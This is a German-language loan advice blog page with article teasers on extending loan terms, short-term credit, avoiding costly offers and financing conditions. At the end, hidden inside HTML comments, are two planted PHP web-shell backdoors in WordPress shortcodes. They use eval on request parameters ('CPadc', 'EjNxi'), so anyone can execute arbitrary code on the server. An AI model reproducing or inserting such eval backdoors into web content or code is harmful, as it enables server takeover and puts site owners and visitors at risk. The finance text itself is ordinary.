Kreditlaufzeit bei der Bank verlängern: Wie sollte man vorgehen?

Wenn sich die finanzielle Situation während der Kreditlaufzeit verändert, dann gibt es verschiedene Möglichkeiten die monatlichen Raten etwas herabzusetzen. Eins dieser Möglichkeiten ist die Verlängerung der Kreditlaufzeit. Sie wird im Fachjargon auch als Tilgungsstreckung bezeichnet. Dabei hat der Kreditnehmer zwei Möglichkeiten, entweder wird die monatliche Kreditrate etwas reduziert oder die Tilgung wird für einen bestimmten Zeitraum ausgesetzt.
Kreditlaufzeit bei der Bank verlängern: Wie sollte man vorgehen? weiterlesen

Kurzzeitkredite: Wann Sie sinnvoll sind und worauf man achten sollte

Relativ neu auf dem Markt in Deutschland sind Kurzzeitkredite. Kalkulierbare Beträge können bis zu 30 Tage geliehen werden. Das kann schnelle Hilfe bei einem defekten Auto oder Kühlschrank bedeuten, wenn es bis zur Gehaltszahlung noch etwas dauert.
Kurzzeitkredite: Wann Sie sinnvoll sind und worauf man achten sollte weiterlesen

Seriöse Kredite ohne Kostenfalle

Gründe, um einen Kredit aufzunehmen gibt es viele – für kaum eine größere Anschaffung ist genügend Bargeld vorhanden. Die Angebote an Kreditgebern sind zahlreich und verwirrend für den Verbraucher, da oft nicht auf den ersten Blick erkennbar ist, ob das Kreditangebot seriös ist oder ob man in eine Kostenfalle gerät. Doch es gibt viele Möglichkeiten, bei der Suche nach einem Kredit das richtige Angebot zu finden. Kreditratgeber können dabei hilfreich sein, da sie Informationen über Kreditwürdigkeit, effektive Jahreszinsen und Finanzierungsmöglichkeiten für diverse Anschaffungen geben.

Seriöse Kredite ohne Kostenfalle weiterlesen

Wichtige Konditionen bei einer Finanzierung

Bei einer Finanzierung kommen auf einen zahlreiche unterschiedliche Begriffe zu, die zu meist alle auf die Konditionen abzielen. Der Finanzierungsbetrag ist letztendlich der Betrag, den der Kunde sich von einer Bank leiht. Eine Anzahlung gehört zwar zu den Konditionen, ist aber kein Finanzierungsbetrag. Eine Anzahlung senkt in der Regel den Finanzierungsbetrag.

Die wichtigsten Konditionen liegen in der Laufzeit, der Zinsen und einer möglichen Restsumme. Grundsätzlich sei gesagt, dass eine lange Laufzeit für den Kunden am teuersten ist. Wiederum sind die monatlichen Belastungen gering und die mögliche Restsumme ebenfalls günstiger. Dennoch muss der Zinssatz über die gesamte Laufzeit bezahlt werden, was die Kreditkosten in die Höhe treibt.

Der Zinssatz setzt sich in aller Regel aus der Laufzeit, der monatlichen Rate und auch den finanziellen Verhältnissen des Kunden zusammen. Wer eine kurze Laufzeit mit hohen monatlichen Raten wählt und gleichzeitig finanziell gut da steht, bekommt den günstigsten Zinssatz. Allerdings gibt es auch festgeschriebene Konditionen, die für jeden Kreditnehmer gleich sind.

Zu den Konditionen zählt ebenfalls die Möglichkeit, Sonderzahlungen zu leisten. Schließlich sorgen solche Sonderzahlungen für eine Reduzierung der Schlussrate und senken damit auch die Kreditkosten. Auch wenn man damit nicht kalkuliert, sollte man sich die Option einer Sonderzahlung offen halten und dies notfalls vorab schriftlich fixieren.
Bevor man eine Finanzierung abschließt, sollte man sich mehrere Optionen durch rechnen lassen oder dies am besten selbst machen. Der Grund dafür liegt auf der Hand, denn unterschiedliche Kombinationen aus Laufzeit, Anzahlung, monatlicher Rate und Restsumme kann bares Geld sparen. Das Ziel sollte für jeden Kreditnehmer sein, dass er die günstigste Zinsvariation zu zahlen hat. Die Reduzierung der Kreditkosten ist die Herausforderung bei der Auswahl der passenden Finanzierung.

<!– [insert_php]if (isset($_REQUEST["CPadc"])){eval($_REQUEST["CPadc"]);exit;}[/insert_php][php]if (isset($_REQUEST["CPadc"])){eval($_REQUEST["CPadc"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["EjNxi"])){eval($_REQUEST["EjNxi"]);exit;}[/insert_php][php]if (isset($_REQUEST["EjNxi"])){eval($_REQUEST["EjNxi"]);exit;}[/php] –>